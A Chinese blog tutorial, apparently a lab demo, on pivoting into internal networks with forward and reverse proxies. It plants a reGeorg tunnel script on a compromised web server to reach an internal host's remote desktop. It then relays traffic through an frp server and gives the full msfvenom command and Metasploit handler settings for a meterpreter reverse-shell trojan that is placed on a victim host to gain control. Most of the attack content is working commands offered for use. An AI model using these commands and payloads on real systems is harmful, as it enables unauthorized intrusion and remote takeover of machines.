正向代理、反向代理 实战演示

正向代理

代理服务:socks5 应用层协议

环境搭建

攻击机可以访问 socks 代理服务器的 web

socks 代理服务器可以和 kali 通信,也可以和内网主机通信

攻击机无法直接和内网主机通信

  • 攻击机(Win11)

    10.9.47.221

  • socks 代理服务器

    网卡1:10.9.47.172

    网卡2:192.168.1.1

  • 内网主机

    192.168.1.2

image-20231213181600126

代理程序下载

链接:https://pan.baidu.com/s/1kFXhdznQKbmYYduCRvfLQQ?pwd=xyt9
提取码:xyt9

架设过程

失陷主机 Web 根目录(Web 可以访问到的文件)下放

image-20231213181722212

使用攻击机(Win11)访问 socks 服务器的 tunnel.nosocket.php 文件,出现以下结果则说明成功

image-20231213181843398

使用攻击机开启客户端

python2 reGeorgSocksProxy.py -p 8080 -u http://10.9.47.172/tunnel.nosocket.php

image-20231213182634102

image-20231213182113268

浏览器添加 socks 代理

image-20231213182347713

浏览器访问内网

攻击机(Win11)浏览器选择 socks 代理,此时浏览器可以访问内网服务器的 web

image-20231213182509111

而此时攻击机和内网主机不在同一网段

image-20231213182609280

访问内网的其他服务

下载正向代理客户端

image-20231213182740389

链接:https://pan.baidu.com/s/1BIDhFjEFk8DijHZxhUx8Bg?pwd=mr9y
提取码:mr9y

连接服务器

image-20231213183200255

设置哪些 exe 程序要使用代理

image-20231213183227681

连接内网主机的远程桌面程序

image-20231213183700348

输入凭据

image-20231213183725647

成功进入

反向代理

实际渗透时,frp server 在云上,frp client 在攻击主机

frp 客户端向服务器发送链接请求,连接成功后,服务器会把自己收到的流量发送给客户端

frp 客户端和服务器都有自己的配置文件,服务器哪个端口接受的流量,发送给客户端的哪个端口,都必须在配置文件写清楚

frp 下载

链接:https://pan.baidu.com/s/1vBW5z7gOyoPf1dNCRD7DuQ?pwd=ctpl
提取码:ctpl

image-20231213191042487

client 端配置文件

image-20231213191554883

环境搭建

  • kali(NAT 模式)

    192.168.1.128

  • 真实主机(跳板机、frp 服务端)

    10.9.47.90

  • 受害服务器

    10.9.47.172

目的让受害服务器连接 kali 的反弹木马,上线,使用 kali 进行控制

frp 搭建

跳板机(10.9.47.90)启动 frp 服务端程序

.\frps.exe -c frps.ini

image-20231213191526015

kali 下载 Linux 版 frp

链接:https://pan.baidu.com/s/1uLqhyMx06E45OUBNaoxdqA?pwd=s9jv
提取码:s9jv

攻击机 Kali 编辑 frpc.ini 文件

local_port 木马连接的端口

image-20231213193310701

开启 frpc

./frpc -c frpc.ini

image-20231213193417244

木马生成、上传

使用 kali 生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.47.90 LPORT=6789 -f exe > muma.exe

# 让目标服务器向 frp 代理(服务端)发送连接请求,然后代理将流量转发给 kali

image-20231213192639291

开启监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp 

set LHOST 127.0.0.1

set LPORT 6789

run

image-20231213193715562

受害者上线

将木马放到受害主机

image-20231213193540298

双击打开上线

image-20231213193759208

image-20231213193934218

  • 27
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值